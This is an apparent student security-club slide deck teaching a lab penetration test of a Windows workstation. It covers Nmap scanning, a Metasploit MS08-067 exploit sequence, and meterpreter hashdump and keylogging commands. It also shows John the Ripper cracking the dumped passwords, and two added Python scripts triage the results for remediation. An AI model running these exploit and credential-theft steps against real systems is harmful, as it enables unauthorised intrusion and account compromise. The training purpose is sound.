Penetration Testing 101
(Boot-camp)
Computer Security Group
Mitchell Adair
utdcsg.org
Outline
  “Interactive” meeting
  Introduction to Backtrack
  A mini penetration test
    Scenario
    Methodology: Enumeration, Exploitation, Post Exploitation
    Exercise
  Summary
  Resources
Scenario
Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations.
You take it back to the lab and begin to test it...
Outline
  Enumeration
    OS, services, versions, filters
  Exploitation
    Match a service + version to a known vulnerability
    Exploit, getting shell access to the box
  Post Exploitation
    Shell is just the beginning... ;)
    Hashes, SSH / GPG keys, pivot, ...
Enumeration
'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org
nmap [Scan Type(s)] [Options] {target specification}
  Scan Types
    -sS, SYN
    -sT, Connect
    -sA, ACK
    ...
  Options
    -O, OS detection
    -sV, service/version detection
    -v, verbose
    ...
… Enumeration
nmap 192.168.1.1
  Default scan: SYN scan, top 1000 ports
nmap -v -sV -O 192.168.1.1 -p 1-65535
  Verbose, services, OS, ports 1 through 65535
nmap -PN --script=smb* -sV -O 192.168.1.1
  Don't ping, run all smb* scripts, services, OS
Nmap Output
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
...
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
...
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S-1-5-21-606747145-1647877149-725345543
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally...
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$
...
| smb-check-vulns:
|_  MS08-067: VULNERABLE
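Reading a scan like the one above by eye works for one host, but across a fleet of workstations the useful step is turning the output into a prioritised finding list for whoever has to patch. The script below is an added example, not part of the slides or of Nmap itself: it parses Nmap's normal-format output (port table plus NSE host script lines), pulls out the open ports, any `smb-check-vulns` verdicts and the anonymously enumerable account names, and ranks them. The sample text is the slide's output embedded inline so the script runs offline; the severity labels and remediation wording are this example's own assumptions.

```python
import re

# Nmap normal-format output taken from the slide, embedded as sample input
# (constructed for this example; the trailing "..." on the Users line was dropped).
SAMPLE_NMAP_OUTPUT = """\
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S-1-5-21-606747145-1647877149-725345543
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# "445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_  MS08-067: VULNERABLE"  (NSE script result line)
VULN_RE = re.compile(r"^\|_?\s+(MS\d{2}-\d{3}|CVE-\d{4}-\d+):\s+(\S+)")
USERS_RE = re.compile(r"Users:\s*(.*)$", re.M)

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def parse_open_ports(text):
    """Return [(port, proto, service, version)] for every port in STATE 'open'."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4), m.group(5).strip()))
    return ports


def parse_vulns(text):
    """Return {vuln_id: status} from smb-check-vulns style NSE lines."""
    vulns = {}
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if m:
            vulns[m.group(1)] = m.group(2)
    return vulns


def parse_enumerated_users(text):
    """Return account names the scanner could list without credentials."""
    m = USERS_RE.search(text)
    return [u.strip() for u in m.group(1).split(",") if u.strip()] if m else []


def triage(text):
    """Turn one host's scan output into [(severity, description)], worst first.

    An empty or port-less scan yields an empty list rather than an error.
    """
    findings = []
    ports = parse_open_ports(text)
    for vuln_id, status in parse_vulns(text).items():
        if status.startswith("VULNERABLE"):
            findings.append(("critical",
                             f"{vuln_id} reported {status}: apply the security update "
                             f"and keep 445/tcp off untrusted networks until it is installed"))
    if any(p[0] in (139, 445) for p in ports):
        findings.append(("high", "SMB reachable (139/445): restrict with the host firewall "
                                 "and disable anonymous (null) sessions"))
    users = parse_enumerated_users(text)
    if users:
        findings.append(("medium", f"{len(users)} account names enumerable anonymously: "
                                   + ", ".join(users)))
    findings.sort(key=lambda f: SEVERITY_ORDER[f[0]])
    return findings


if __name__ == "__main__":
    for severity, text in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{severity.upper():8}] {text}")
```

The parser deliberately keys on the NSE result line format (`|_  MS08-067: VULNERABLE`) rather than on the script name, so any vulnerability check that reports an MS or CVE identifier in the same shape lands in the critical bucket.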
Exploitation
Metasploit – Penetration Testing Framework
  tools, libraries, modules, and user interfaces
# msfconsole
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
Post Exploitation
  Gather useful information
    SSH & GPG keys, hashes, etc...
  Meterpreter “post” modules
  Pivot

meterpreter > hashdump
  sysinfo
  keyscan_(start | stop | dump)
  download
  migrate
  shell
… Post Exploitation
We dumped the hashes... now what?
  Pass the hash
  Crack the hash
John the Ripper, a tool to find weak passwords of your users
john [options] password-files
  --wordlist
  --users, --groups
  --session, --restore
… Post Exploitation
john --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s: 25730  trying: SKIDOO - ZHONGGU
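The same john run that shows the attacker how far a wordlist gets is, for the administrator, a password audit: every line above is an account that needs a reset and a policy that let it through. The script below is an added example, not part of the slides or of John the Ripper: it parses john's output, rejoins the two LM halves (`webmaster:1` + `webmaster:2`) into one password, flags empty and short passwords, and notes that LM hashes are stored at all (LM upper-cases the password and splits it into two independent 7-character halves, which is why the halves crack separately). The sample text is the slide's output embedded inline; the 8-character policy minimum is this example's assumption.

```python
import re

# john output taken from the slide, embedded as constructed sample input.
# "webmaster:1" / "webmaster:2" are the two 7-character halves of one LM hash.
SAMPLE_JOHN_OUTPUT = """\
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s: 25730  trying: SKIDOO - ZHONGGU
"""

# "<password>   (<user>)" or "<password>   (<user>:<half>)"; an empty password
# leaves only whitespace before the parenthesised label.
CRACKED_RE = re.compile(r"^(\S*)\s+\((\S+)\)\s*$")


def parse_cracked(text):
    """Map account name -> recovered password, rejoining LM halves user:1 + user:2."""
    halves = {}
    cracked = {}
    for line in text.splitlines():
        m = CRACKED_RE.match(line)
        if not m:
            continue  # "Loaded ..." / "guesses: ..." status lines
        password, label = m.group(1), m.group(2)
        if ":" in label:
            user, idx = label.rsplit(":", 1)
            halves.setdefault(user, {})[idx] = password
        else:
            cracked[label] = password
    for user, parts in halves.items():
        # Half 2 is absent/empty when the LM password was 7 characters or fewer.
        cracked[user] = parts.get("1", "") + parts.get("2", "")
    return cracked


def uses_lm_hashes(text):
    """True if john loaded LM hashes, i.e. the host still stores the weak LM format."""
    return re.search(r"^Loaded .*\bLM\b", text, re.M) is not None


def audit_accounts(cracked, min_length=8):
    """Return [(user, reason)] for every cracked account, sorted by name.

    min_length is an assumed policy value; any recovered password is reported,
    the reason just says which rule would have stopped it.
    """
    findings = []
    for user, password in sorted(cracked.items()):
        if password == "":
            reason = "empty password"
        elif len(password) < min_length:
            reason = f"only {len(password)} characters (policy minimum {min_length})"
        elif user.lower() in password.lower():
            reason = "password contains the account name"
        else:
            reason = "recovered from the wordlist; rotate and reject dictionary words"
        findings.append((user, reason))
    return findings


if __name__ == "__main__":
    cracked = parse_cracked(SAMPLE_JOHN_OUTPUT)
    if uses_lm_hashes(SAMPLE_JOHN_OUTPUT):
        print("[host] LM hashes present: disable LM hash storage (NT-only)")
    for user, reason in audit_accounts(cracked):
        print(f"[reset] {user}: {reason}")
```

The reported passwords themselves never need to leave the audit host; the report only carries the account name and the rule it failed, which is what the helpdesk needs to force the resets.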
So... let's get started
Boot up to your Backtrack CD
  passwd
  /etc/init.d/networking start
  startx
Follow along... let's pwn this box :)
Summary
Clearly... Company X's default user workstations need some work.
Now let's do the paperwork!... just kidding ;)
Hopefully this gives everyone a hands-on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!
Resources
utdcsg.org - Presentations, articles, resources, etc.
IRC - irc.oftc.net, #utdcsg
Nmap - nmap.org/5/
Metasploit - metasploit.com/
John the Ripper - openwall.com/john/